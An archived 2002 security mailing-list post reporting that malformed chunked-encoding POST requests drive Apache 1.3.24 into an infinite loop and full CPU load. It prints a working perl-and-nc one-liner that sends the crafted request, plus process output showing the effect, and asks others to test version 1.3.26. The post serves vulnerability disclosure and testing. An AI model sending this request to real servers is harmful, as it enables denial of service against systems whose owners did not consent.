apache chunked encoding

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Jun 19 2002 - 15:21:47 PDT

Next message: Peter Mueller: "RE: procmail heap overflow"

Previous message: KF: "Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server"
Next in thread: Edwin Groothuis: "Re: apache chunked encoding"
Reply: Edwin Groothuis: "Re: apache chunked encoding"
Reply: David Bernick: "Re: apache chunked encoding"
Reply: Horner, Jonathan J. (JH8) : "RE: apache chunked encoding"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello.

I was playing a bit with chunked encoding vulnerability and found the
following. When I send a request to Apache 1.3.24 using malformed
chunked encoding, httpd process goes into infinite loop and CPU load
grows to 100%. Example:

perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept: */*\r\nHost: www\r\nContent-Type: application/x-www-form-urlencoded\r\nTransfer-Encoding: chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc localhost 80

62681 www       63   0   146M  5364K RUN      3:08 45.90% 45.90% apache
42121 www       63   0   139M  2524K RUN      1:15 44.97% 44.97% apache

Can anyone try it with 1.3.26?

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *

Next message: Peter Mueller: "RE: procmail heap overflow"
Previous message: KF: "Re: ISS Advisory: Remote Compromise Vulnerability in Apache HTTP Server"
Next in thread: Edwin Groothuis: "Re: apache chunked encoding"
Reply: Edwin Groothuis: "Re: apache chunked encoding"
Reply: David Bernick: "Re: apache chunked encoding"
Reply: Horner, Jonathan J. (JH8) : "RE: apache chunked encoding"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jun 19 2002 - 17:18:31 PDT